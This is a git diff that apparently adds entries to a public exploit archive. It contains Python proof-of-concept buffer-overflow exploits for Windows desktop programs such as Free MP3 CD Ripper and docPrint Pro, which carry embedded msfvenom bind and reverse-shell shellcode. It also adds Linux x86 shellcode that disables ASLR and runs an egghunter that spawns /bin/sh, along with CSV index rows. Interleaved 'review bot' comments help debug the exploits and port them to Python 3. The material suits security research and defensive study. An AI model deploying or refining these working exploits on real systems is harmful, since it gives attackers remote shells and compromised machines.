+"\x61\x46\x52\x76\x53\x76\x53\x66\x50\x4e\x46\x36\x33\x66\x36" +"\x33\x42\x76\x52\x48\x70\x79\x68\x4c\x37\x4f\x4f\x76\x59\x6f" +"\x38\x55\x4f\x79\x6b\x50\x70\x4e\x32\x76\x77\x36\x49\x6f\x46" +"\x50\x55\x38\x44\x48\x6d\x57\x47\x6d\x61\x70\x59\x6f\x6e\x35" +"\x4d\x6b\x4b\x4e\x74\x4e\x64\x72\x39\x7a\x72\x48\x4e\x46\x6c" +"\x55\x6f\x4d\x6d\x4d\x59\x6f\x48\x55\x65\x6c\x66\x66\x71\x6c" +"\x37\x7a\x6f\x70\x79\x6b\x6d\x30\x54\x35\x66\x65\x6f\x4b\x47" +"\x37\x46\x73\x53\x42\x72\x4f\x72\x4a\x55\x50\x66\x33\x49\x6f" +"\x39\x45\x41\x41") +buffer+="\xeb\xb6\x90\x90" #Backward short jump- nseh +buffer+="\x6d\x57\x37\x7c" #PPR- SEH +buffer+="A"*200 
+file.write(buffer+shellcode) +file.close() \ No newline at end of file diff --git a/exploits/windows/local/48696.py b/exploits/windows/local/48696.py new file mode 100755 index 000000000..e7558d29a --- /dev/null +++ b/exploits/windows/local/48696.py 
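Review bot: `file.write(buffer+shellcode)` hands a `str` to a file opened `"w+b"`, which only works on Python 2; on Python 3 it raises `TypeError`, so either make every literal `b"..."` or write `(buffer+shellcode).encode("latin-1")`. The variable `file` shadows the builtin and the handle is closed by hand; `with open("payload.txt", "wb") as fh:` fixes both. By my arithmetic the nSEH short jump `\xeb\xb6` (-74 from the byte after it, at offset 218) lands at offset 144, inside the 164-byte NOP sled ahead of the egghunter; the comment `#Backward short jump- nseh` should say where it lands so the sled is not shortened by accident. The egghunter's tag immediate `\xb8\x73\x61\x72\x61` is "sara" and must stay in sync with the `"sarasara"` prefix on `shellcode`; a comment tying the two together would help.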
@@ -0,0 +1,62 @@ +# Exploit Title: Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter) +# Date: 2020-07-22 +# Exploit Author: Eduard Palisek +# Vendor Homepage: https://www.cleanersoft.com +# Software Link: https://www.cleanersoft.com/download/FMCRSetup.exe +# Version: 2.8 Build 20140611 +# Tested on: [Windows XP, Professional, Version 2002, SP 3 +#!/usr/bin/python +file = open("exploit.wav", "wb") + +# msfvenom -p windows/shell_bind_tcp LPORT=9001 -a x86 EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d\" -f python -v shellcode_bind + +shellcode_bind = b"" +shellcode_bind += b"\xb8\x88\xbf\xa2\x65\xdb\xd6\xd9\x74\x24" +shellcode_bind += b"\xf4\x5a\x2b\xc9\xb1\x53\x83\xc2\x04\x31" +shellcode_bind += b"\x42\x0e\x03\xca\xb1\x40\x90\x36\x25\x06" +shellcode_bind += b"\x5b\xc6\xb6\x67\xd5\x23\x87\xa7\x81\x20" +shellcode_bind += b"\xb8\x17\xc1\x64\x35\xd3\x87\x9c\xce\x91" +shellcode_bind += b"\x0f\x93\x67\x1f\x76\x9a\x78\x0c\x4a\xbd" +shellcode_bind += b"\xfa\x4f\x9f\x1d\xc2\x9f\xd2\x5c\x03\xfd" +shellcode_bind += b"\x1f\x0c\xdc\x89\xb2\xa0\x69\xc7\x0e\x4b" +shellcode_bind += b"\x21\xc9\x16\xa8\xf2\xe8\x37\x7f\x88\xb2" +shellcode_bind += b"\x97\x7e\x5d\xcf\x91\x98\x82\xea\x68\x13" +shellcode_bind += b"\x70\x80\x6a\xf5\x48\x69\xc0\x38\x65\x98" +shellcode_bind += b"\x18\x7d\x42\x43\x6f\x77\xb0\xfe\x68\x4c" +shellcode_bind += b"\xca\x24\xfc\x56\x6c\xae\xa6\xb2\x8c\x63" +shellcode_bind += b"\x30\x31\x82\xc8\x36\x1d\x87\xcf\x9b\x16" +shellcode_bind += b"\xb3\x44\x1a\xf8\x35\x1e\x39\xdc\x1e\xc4" +shellcode_bind += b"\x20\x45\xfb\xab\x5d\x95\xa4\x14\xf8\xde" +shellcode_bind += b"\x49\x40\x71\xbd\x05\xa5\xb8\x3d\xd6\xa1" +shellcode_bind += b"\xcb\x4e\xe4\x6e\x60\xd8\x44\xe6\xae\x1f" +shellcode_bind += b"\xaa\xdd\x17\x8f\x55\xde\x67\x86\x91\x8a" +shellcode_bind += b"\x37\xb0\x30\xb3\xd3\x40\xbc\x66\x49\x48" +shellcode_bind += b"\x1b\xd9\x6c\xb5\xdb\x89\x30\x15\xb4\xc3" +shellcode_bind += b"\xbe\x4a\xa4\xeb\x14\xe3\x4d\x16\x97\x28" +shellcode_bind += 
b"\xa7\x9f\x71\x44\xa7\xc9\x2a\xf0\x05\x2e" +shellcode_bind += b"\xe3\x67\x75\x04\x5b\x0f\x3e\x4e\x5c\x30" +shellcode_bind += b"\xbf\x44\xca\xa6\x34\x8b\xce\xd7\x4a\x86" +shellcode_bind += b"\x66\x80\xdd\x5c\xe7\xe3\x7c\x60\x22\x93" +shellcode_bind += b"\x1d\xf3\xa9\x63\x6b\xe8\x65\x34\x3c\xde" +shellcode_bind += b"\x7f\xd0\xd0\x79\xd6\xc6\x28\x1f\x11\x42" +shellcode_bind += b"\xf7\xdc\x9c\x4b\x7a\x58\xbb\x5b\x42\x61" +shellcode_bind += b"\x87\x0f\x1a\x34\x51\xf9\xdc\xee\x13\x53" +shellcode_bind += b"\xb7\x5d\xfa\x33\x4e\xae\x3d\x45\x4f\xfb" +shellcode_bind += b"\xcb\xa9\xfe\x52\x8a\xd6\xcf\x32\x1a\xaf" +shellcode_bind += b"\x2d\xa3\xe5\x7a\xf6\xc3\x07\xae\x03\x6c" +shellcode_bind += b"\x9e\x3b\xae\xf1\x21\x96\xed\x0f\xa2\x12" +shellcode_bind += b"\x8e\xeb\xba\x57\x8b\xb0\x7c\x84\xe1\xa9" +shellcode_bind += b"\xe8\xaa\x56\xc9\x38" + +egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x57\x30\x30\x54\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + +nops = "\x90" * 30 +junk1 = "A" * 2112 +tag = "W00TW00T" +junk2 = "B" * (2000-len(shellcode_bind+nops+tag)) +eip = "\x53\x93\x42\x7e" # 0x7e429353 : jmp esp in user32.dll + +buffer = junk1 + tag + nops + shellcode_bind + junk2 + eip + nops + egghunter + +file.write(buffer) +file.close() \ No newline at end of file diff --git a/exploits/windows/local/48719.py b/exploits/windows/local/48719.py new file mode 100755 index 000000000..acf6c7333 --- /dev/null +++ b/exploits/windows/local/48719.py 
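Review bot: The PoC overwrites the saved return address directly — `eip = "\x53\x93\x42\x7e" # jmp esp` — and the layout `junk1 + tag + nops + shellcode_bind + junk2 + eip + nops + egghunter` has no nSEH/SEH pair, so as far as the visible code shows this is a plain EIP overwrite while the title (and the CSV row) says "SEH + Egghunter"; either the description should be corrected or a comment should explain the SEH claim. `shellcode_bind` is a `bytes` literal but `junk1`, `tag`, `nops`, `eip` and `egghunter` are `str`, so `buffer = junk1 + tag + ...` and `len(shellcode_bind+nops+tag)` only work on Python 2; make every piece `b"..."` since the file is already opened `"wb"`. The msfvenom line's badchar argument `-b "\x00\x0a\x0d\"` ends with an escaped quote, so pasting it into a shell waits for a closing quote; it should read `-b "\x00\x0a\x0d"`. The payload is an unauthenticated bind shell on TCP 9001, which is worth stating in the header since anyone who can reach the victim gets the session.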
@@ -0,0 +1,99 @@ +# Exploit Title: docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter) +# Date: 2020-07-26 +# Exploit Author: MasterVlad +# Vendor Homepage: http://www.verypdf.com +# Software Link: http://dl.verypdf.net/docprint_pro_setup.exe +# Version: 8.0 +# Vulnerability Type: Local Buffer Overflow +# Tested on: Windows 7 32-bit + +# Proof of Concept: + +# 1. Run the python script +# 2. Open exploit.txt and copy the content to clipboard +# 3. Open doc2pdf_win.exe and go to File -> Add URL +# 4. Paste the clipboard into the field and click on Ok + +#!/usr/bin/python + +# encoded egghunter +egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c\x25\x4A" +egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50" + +# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI + +buf = "" +buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" +buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" +buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63" +buf += 
"\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b" +buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70" +buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37" +buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53" +buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f" +buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66" +buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c" +buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56" +buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71" +buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50" +buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61" +buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f" +buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d" +buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43" +buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46" +buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35" +buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50" +buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33" +buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f" +buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31" +buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68" +buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42" +buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38" +buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70" +buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70" +buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43" +buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f" +buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56" +buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48" +buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30" +buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45" +buf += 
"\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44" +buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c" +buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58" +buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39" +buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50" +buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46" +buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c" +buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64" +buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42" +buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58" +buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d" +buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50" +buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b" +buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58" +buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55" +buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50" +buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70" +buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41" + +exploit = "A"*3876 +exploit += "\x74\x06\x75\x04" +# 0x1001062d - pop pop ret - reg.dll +exploit += "\x2d\x06\x01\x10" +exploit += egg +exploit += "D"*(10000-3884-len(egg)-len(buf)-8) +exploit += "T00WT00W" +exploit += buf + +f = open("exploit.txt", "w") +f.write(exploit) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index cc50ac2d9..a47226220 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
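Review bot: The msfvenom badchar list `-b "\x00\x0a\x0d\x13\x14\x15\x16"` excludes 0x13–0x16, yet the encoded egghunter placed in the same buffer contains `\x16` and `\x15` (`\x2D\x01\x16\x02\x15\x50`), identical to the hunter in 48691 where those bytes were not listed as bad; if the 'Add URL' field really filters them the hunter is corrupted before it runs, and if it does not, the exclusion only lengthens the payload. A comment stating which bytes were empirically bad, and whether that was measured where the SEH chain lands or where the `T00WT00W` copy lands, would resolve this, since the two regions can differ. The `#!/usr/bin/python` after the header comments is not a shebang. As with the sibling PoCs, `LHOST=192.168.164.129 LPORT=443` is baked into the alpha-encoded `buf` and must be regenerated before use.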
@@ -6754,6 +6754,7 @@ id,file,description,date,author,type,platform,port
 48617,exploits/windows/dos/48617.py,"Code Blocks 20.03 - Denial Of Service (PoC)",2020-06-23,"Paras Bhatia",dos,windows,
 48637,exploits/windows/dos/48637.py,"Fire Web Server 0.1 - Remote Denial of Service (PoC)",2020-07-06,"Saeed reza Zamanian",dos,windows,
 48638,exploits/linux/dos/48638.sh,"Grafana 7.0.1 - Denial of Service (PoC)",2020-07-06,mostwanted002,dos,linux,
+48697,exploits/windows/dos/48697.py,"Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)",2020-07-26,"Felipe Winsnes",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11125,6 +11126,13 @@ id,file,description,date,author,type,platform,port
 48680,exploits/windows/local/48680.py,"NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)",2020-07-22,"Saeed reza Zamanian",local,windows,
 48685,exploits/windows/local/48685.py,"FTPDummy 4.80 - Local Buffer Overflow (SEH)",2020-07-23,"Felipe Winsnes",local,windows,
 48686,exploits/windows/local/48686.py,"Snes9K 0.09z - 'Port Number' Buffer Overflow (SEH)",2020-07-23,MasterVlad,local,windows,
+48687,exploits/windows/local/48687.py,"Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH)",2020-07-26,"Felipe Winsnes",local,windows,
+48688,exploits/windows/local/48688.py,"Frigate Professional 3.36.0.9 - 'Pack File' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
+48689,exploits/windows/local/48689.py,"DiskBoss 7.7.14 - 'Reports and Data Directory' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
+48691,exploits/windows/local/48691.py,"Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
+48695,exploits/windows/local/48695.py,"Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH)",2020-07-26,"Sarang Tumne",local,windows,
+48696,exploits/windows/local/48696.py,"Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter)",2020-07-26,"Eduard Palisek",local,windows,
+48719,exploits/windows/local/48719.py,"docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42933,3 +42941,23 @@ id,file,description,date,author,type,platform,port 48682,exploits/php/webapps/48682.txt,"WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection",2020-07-22,"Vlad Vector",webapps,php, 48683,exploits/multiple/webapps/48683.py,"Sophos VPN Web Panel 2020 - Denial of Service (Poc)",2020-07-22,"Berk KIRAS",webapps,multiple, 48684,exploits/hardware/webapps/48684.txt,"UBICOD Medivision Digital Signage 1.5.1 - Authorization Bypass",2020-07-23,LiquidWorm,webapps,hardware, +48690,exploits/php/webapps/48690.txt,"GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated)",2020-07-26,Balzabu,webapps,php, +48692,exploits/java/webapps/48692.py,"ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection",2020-07-26,aldorm,webapps,java, +48693,exploits/multiple/webapps/48693.go,"INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution",2020-07-26,"Patrick Hener",webapps,multiple, +48694,exploits/hardware/webapps/48694.txt,"UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin)",2020-07-26,LiquidWorm,webapps,hardware, +48698,exploits/php/webapps/48698.txt,"WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download",2020-07-26,KBA@SOGETI_ESEC,webapps,php, +48699,exploits/php/webapps/48699.sh,"WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)",2020-07-26,KBA@SOGETI_ESEC,webapps,php, +48701,exploits/multiple/webapps/48701.txt,"Bludit 3.9.2 - Directory Traversal",2020-07-26,"James Green",webapps,multiple, +48702,exploits/php/webapps/48702.txt,"LibreHealth 2.0.0 - Authenticated Remote Code Execution",2020-07-26,boku,webapps,php, +48704,exploits/php/webapps/48704.py,"Online Course Registration 1.0 - Unauthenticated Remote Code Execution",2020-07-26,boku,webapps,php, +48705,exploits/php/webapps/48705.txt,"elaniin CMS - Authentication Bypass",2020-07-26,BKpatron,webapps,php, +48706,exploits/php/webapps/48706.txt,"Koken CMS 
0.22.24 - Arbitrary File Upload (Authenticated)",2020-07-26,V1n1v131r4,webapps,php, +48707,exploits/php/webapps/48707.txt,"PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting",2020-07-26,AppleBois,webapps,php, +48708,exploits/multiple/webapps/48708.txt,"Bio Star 2.8.2 - Local File Inclusion",2020-07-26,"SITE Team",webapps,multiple, +48709,exploits/php/webapps/48709.txt,"Webtareas 2.1p - Arbitrary File Upload (Authenticated)",2020-07-26,AppleBois,webapps,php, +48711,exploits/hardware/webapps/48711.py,"F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion",2020-07-26,"Carlos E. Vieira",webapps,hardware, +48712,exploits/multiple/webapps/48712.txt,"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)",2020-07-26,bdrake,webapps,multiple, +48713,exploits/multiple/webapps/48713.txt,"Socket.io-file 2.0.31 - Arbitrary File Upload",2020-07-26,Cr0wTom,webapps,multiple, +48714,exploits/php/webapps/48714.txt,"pfSense 2.4.4-p3 - Cross-Site Request Forgery",2020-07-26,ghost_fh,webapps,php, +48715,exploits/php/webapps/48715.txt,"Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting",2020-07-26,"Peter Blue",webapps,php, +48716,exploits/ruby/webapps/48716.rb,"Rails 5.0.1 - Remote Code Execution",2020-07-26,"Lucas Amorim",webapps,ruby, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 5b4a7b3f8..b4f57a163 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv 
@@ -1024,3 +1024,6 @@ id,file,description,date,author,type,platform
 48379,shellcodes/linux/48379.c,"Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux
 48585,shellcodes/arm/48585.c,"Linux/ARM - execve /bin/dash Shellcode (32 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm
 48586,shellcodes/arm/48586.c,"Linux/ARM - Bind (0.0.0.0:1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (100 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm
+48592,shellcodes/linux_x86/48592.c,"Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes)",2020-06-17,"Xenofon Vassilakopoulos",shellcode,linux_x86
+48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",2020-07-26,danf42,shellcode,linux_x86
+48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download using mshta.exe Shellcode (100 bytes)",2020-07-26,"Siddharth Sharma",shellcode,windows_x86
diff --git a/shellcodes/linux_x86/48592.c b/shellcodes/linux_x86/48592.c
new file mode 100644
index 000000000..f9a60e101
--- /dev/null
+++ b/shellcodes/linux_x86/48592.c
@@ -0,0 +1,79 @@
+# Title: Linux/x86 - ASLR deactivation polymorphic shellcode ( 124 bytes )
+# Author: Xenofon Vassilakopoulos
+# Date: 2020-06-11
+# Tested on: Linux 3.13.0-32-generic #57~precise1-Ubuntu i686 i386 GNU/Linux
+# Architecture: i686 GNU/Linux
+# Shellcode Length: 124 bytes
+# Original shellcode: http://shell-storm.org/shellcode/files/shellcode-813.php
+# SLAE-ID: SLAE - 1314
+# Description: polymorphic version of ASLR deactivation shellcode
+
+
+------------------ ASLR deactivation ------------------
+
+global _start
+
+section .text
+
+_start:
+ xor ebx,ebx
+ mul ebx
+ mov DWORD [esp-0x4],eax
+ mov DWORD [esp-0x8],0x65636170
+ mov DWORD [esp-0xc],0x735f6176
+ mov DWORD [esp-0x10],0x5f657a69
+ mov DWORD [esp-0x14],0x6d6f646e
+ mov DWORD [esp-0x18],0x61722f6c
+ mov DWORD [esp-0x1c],0x656e7265
+ mov DWORD [esp-0x20],0x6b2f7379
+ mov DWORD [esp-0x24],0x732f636f
+ mov DWORD [esp-0x28],0x72702f2f
+ sub esp,0x28
+ mov ebx,esp
+ mov cx,0x301
+ mov dx,0x2a1
+ add dx,0x1b
+ mov al, 0x5
+ int 0x80
+ mov ebx,eax
+ push ebx
+ mov cx,0x3b30
+ push cx
+ mov ecx,esp
+ shr edx, 16
+ inc edx
+ mov al,0x4
+ int 0x80
+ mov al,0x1
+ int 0x80
+
+------------------ shellcode ------------------
+
+
+#include 
+#include 
+
+unsigned char code[] = \
+ "\x31\xdb\xf7\xe3\x89\x44\x24\xfc\xc7"
+ "\x44\x24\xf8\x70\x61\x63\x65\xc7\x44"
+ "\x24\xf4\x76\x61\x5f\x73\xc7\x44\x24"
+ "\xf0\x69\x7a\x65\x5f\xc7\x44\x24\xec"
+ "\x6e\x64\x6f\x6d\xc7\x44\x24\xe8\x6c"
+ "\x2f\x72\x61\xc7\x44\x24\xe4\x65\x72"
+ "\x6e\x65\xc7\x44\x24\xe0\x79\x73\x2f"
+ "\x6b\xc7\x44\x24\xdc\x6f\x63\x2f\x73"
+ "\xc7\x44\x24\xd8\x2f\x2f\x70\x72\x83"
+ "\xec\x28\x89\xe3\x66\xb9\x01\x03\x66"
+ "\xba\xa1\x02\x66\x83\xc2\x1b\xb0\x05"
+ "\xcd\x80\x89\xc3\x53\x66\xb9\x30\x3b"
+ "\x66\x51\x89\xe1\xc1\xea\x10\x42\xb0"
+ "\x04\xcd\x80\xb0\x01\xcd\x80";
+
+main()
+{
+printf("Shellcode Length: %d\n", strlen(code));
+
+int (*ret)() = (int(*)())code;
+
+ret();
+}
\ No newline at end of file
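Review bot: The shellcode never checks the result of `open` (eax after the first `int 0x80`), so when it runs without root the negative errno from opening `/proc/sys/kernel/randomize_va_space` for writing becomes the fd handed to `write`, and the payload exits with ASLR still enabled; the header should state the root requirement. `mov cx,0x301` and `mov dx,0x2a1`/`add dx,0x1b` are opaque, so a comment such as `; ecx = O_WRONLY|O_NOCTTY|O_TRUNC` on the first would document the flags, and `mov al,0x4` after `mov ebx,eax` only rewrites the low byte of the returned fd, which silently assumes fd < 256. In the harness, `main()` with an implicit int return is not valid C99 and `%d` with `strlen` mismatches `size_t`; `int main(void)` and `%zu` fix both, and the compile line with `-z execstack` that the sibling 48703.c gives is missing here.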
diff --git a/shellcodes/linux_x86/48703.c b/shellcodes/linux_x86/48703.c
new file mode 100644
index 000000000..5fb2f2c38
--- /dev/null
+++ b/shellcodes/linux_x86/48703.c
@@ -0,0 +1,75 @@
+# Exploit Title: Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)
+# Author: danf42
+# Date: 2020-07-16
+# Platform: Linux/x86
+
+/*******************************************************************************
+ sigaction(2) approach to egghunting as described in the paper
+ "Safely Searching Process Virtual Address Space" by skape
+
+ The shellcode prepares the registers to start the hunting by clearing the
+ direction flag and setting eax, ecx, and edx to 0
+
+Egg value is 0x50905090
+
+global _start
+
+section .text
+
+_start:
+ cld ; clear the direction flag
+ xor ecx, ecx ; clear ecx
+ mul ecx ; multiply by ecx, zero out eax and edx
+IncPage:
+ or cx, 0xfff ; Align page address
+IncAddr:
+ inc ecx ; Go to next address
+ push byte 0x43 ; syscall for sigaction()
+ pop eax ; Put syscall value into EAX
+ int 0x80 ; call sigaction() to check memory location [ECX]
+ cmp al, 0xf2 ; Did it return EFAULT, Bad Address
+ jz IncPage ; Skip page if it returned EFAULT
+ mov eax, 0x50905090 ; Store EGG in EAX
+ mov edi, ecx ; Move ECX to EDI for scasd operation
+ scasd ; Check if [EDI] == EAX then increment EDI
+ jnz IncAddr ; Increment address if no match
+ scasd ; Check if [EDI] == EAX then increment EDI
+ jnz IncAddr ; Increment address if no match
+ jmp edi ; Jump to EDI (our shellcode) if both eggs are found
+
+POC Shellcode to execute /bin/sh
+ xor ecx, ecx ; clear ecx
+ mul ecx ; mutliply eax by 0
+ push eax ; push eax onto stack
+ push 0x68732f2f ; push ASCII sh// onto stack
+ push 0x6e69622f ; push ASCII nib/ onto stack
+ mov ebx, esp ; push /bin/sh into ebx
+ mov al, 0xb ; mov 11 into lower byte of eax
+ int 0x80 ; execute execve syscall
+
+ mov al,0x01 ; move 1 into lower byte of each
+ xor ebx,ebx ; clear ebx
+ int 0x80 ; execute exit syscall
+
+To Cmpile:
+ gcc sigaction_egghunter.c -fno-stack-protector -z execstack -o sigaction_egghunter
+
+*******************************************************************************/
+
+#include 
+#include 
+
